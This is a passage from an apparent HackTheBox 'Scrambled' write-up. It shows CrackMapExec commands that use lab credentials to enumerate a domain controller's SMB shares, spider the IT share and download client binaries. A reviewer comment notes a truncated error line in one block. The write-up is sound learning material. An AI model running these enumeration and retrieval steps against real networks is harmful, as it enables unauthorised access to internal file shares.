have the root flag but it seems it is not the end #### 13. 
Getting readable shares for user miscsvc ``` crackmapexec smb DC1.scrm.local -u MiscSvc -p ScrambledEggs9900 -d scrm.local -k --shares SMB DC1.scrm.local 445 DC1.scrm.local [*] None x64 (name:DC1.scrm.local) (domain:scrm.local) (signing:True) (SMBv1:False) SMB DC1.scrm.local 445 DC1.scrm.local [+] scrm.local\MiscSvc:ScrambledEggs9900 SMB DC1.scrm.local 445 DC1.scrm.local [+] Enumerated shares SMB DC1.scrm.local 445 DC1.scrm.local Share Permissions Remark SMB DC1.scrm.local 445 DC1.scrm.local ----- ----------- ------ SMB DC1.scrm.local 445 DC1.scrm.local ADMIN$ Remote Admin SMB DC1.scrm.local 445 DC1.scrm.local C$ Default share SMB DC1.scrm.local 445 DC1.scrm.local HR SMB DC1.scrm.local 445 DC1.scrm.local IPC$ READ Remote IPC SMB DC1.scrm.local 445 DC1.scrm.local IT READ SMB DC1.scrm.local 445 DC1.scrm.local NETLOGON READ Logon server share SMB DC1.scrm.local 445 DC1.scrm.local Public READ SMB DC1.scrm.local 445 DC1.scrm.local Sales SMB DC1.scrm.local 445 DC1.scrm.local SYSVOL READ Logon server share ``` #### 14. List file inside IT share ``` ing module at /home/kali/cme-gitlab/cme/modules/masky.py: No module named 'masky' SMB DC1.scrm.local 445 DC1.scrm.local [*] None x64 (name:DC1.scrm.local) (domain:scrm.local) (signing:True) (SMBv1:False) SMB DC1.scrm.local 445 DC1.scrm.local [+] scrm.local\MiscSvc:ScrambledEggs9900 SPIDER_P... DC1.scrm.local 445 DC1.scrm.local [*] Started spidering plus with option: SPIDER_P... DC1.scrm.local 445 DC1.scrm.local [*] DIR: ['netlogon', 'public', 'sysvol', 'ipc$'] SPIDER_P... DC1.scrm.local 445 DC1.scrm.local [*] EXT: ['ico', 'lnk'] SPIDER_P... DC1.scrm.local 445 DC1.scrm.local [*] SIZE: 51200 SPIDER_P... 
DC1.scrm.local 445 DC1.scrm.local [*] OUTPUT: /tmp/cme_spider_plus ┌──(kali㉿kali)-[~/cme-gitlab] └─$ cat /tmp/cme_spider_plus/DC1.scrm.local.json { "IT": { "Apps/Sales Order Client/ScrambleClient.exe": { "atime_epoch": "2021-11-05 16:57:06", "ctime_epoch": "2021-11-05 16:47:10", "mtime_epoch": "2021-11-05 16:57:08", "size": "84.5 KB" }, "Apps/Sales Order Client/ScrambleLib.dll": { "atime_epoch": "2021-11-05 16:57:06", "ctime_epoch": "2021-11-05 16:47:10", "mtime_epoch": "2021-11-05 16:57:08", "size": "19 KB" } } } ``` #### 15. Getting the two files ``` crackmapexec smb DC1.scrm.local -u MiscSvc -p ScrambledEggs9900 -d scrm.local -k --get-file 'Apps/Sales Order Client/ScrambleClient.exe' /tmp/file.exe --share "IT" SMB DC1.scrm.local 445 DC1.scrm.local [*] None x64 (name:DC1.scrm.local) (domain:scrm.local) (signing:True) (SMBv1:False) SMB DC1.scrm.local 445 DC1.scrm.local [+] scrm.local\MiscSvc:ScrambledEggs9900 SMB DC1.scrm.local 445 DC1.scrm.local [*] Copy Apps/Sales Order Client/ScrambleClient.exe to /tmp/file.exe SMB DC1.scrm.local 445 DC1.scrm.local [+] File Apps/Sales Order Client/ScrambleClient.exe was transferred to /tmp/file.exe crackmapexec smb DC1.scrm.local -u MiscSvc -p ScrambledEggs9900 -d scrm.local -k --get-file 'Apps/Sales Order Client/ScrambleLib.dll' /tmp/file.dll --share "IT" SMB DC1.scrm.local 445 DC1.scrm.local [*] None x64 (name:DC1.scrm.local) (domain:scrm.local) (signing:True) (SMBv1:False) SMB DC1.scrm.local 445 DC1.scrm.local [+] scrm.local\MiscSvc:ScrambledEggs9900 SMB DC1.scrm.local 445 DC1.scrm.local [*] Copy Apps/Sales Order Client/ScrambleLib.dll to /tmp/file.dll SMB DC1.scrm.local 445 DC1.scrm.local [+] File Apps/Sales Order Client/ScrambleLib.dll was transferred to /tmp/file.dll ``` For the rest, follow https://0xdf.gitlab.io/2022/10/01/htb-scrambled-linux.html => part ScrambleClient Reverse ! 
That's all for me, I hope you learn a bit more about CrackMapExec, for latest news follow me on twitter => [@mpgn_x64](https://twitter.com/mpgn_x64) and follow [@0xdf_](https://twitter.com/0xdf_) for the HTB writeup :)
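Review bot: the step-14 block in this initial revision opens with `ing module at /home/kali/cme-gitlab/cme/modules/masky.py: No module named 'masky'`, a truncated module-load error from the local CrackMapExec checkout (a missing `masky` dependency) that has nothing to do with the target and sits where the command line should be; remove it and show the `spider_plus` invocation instead. The `Support: https://0xdf.gitlab.io/2022/10/01/htb-scrambled-linux.html` line under the note about `ksimpson` duplicates the link already given in the intro and in the closing paragraph.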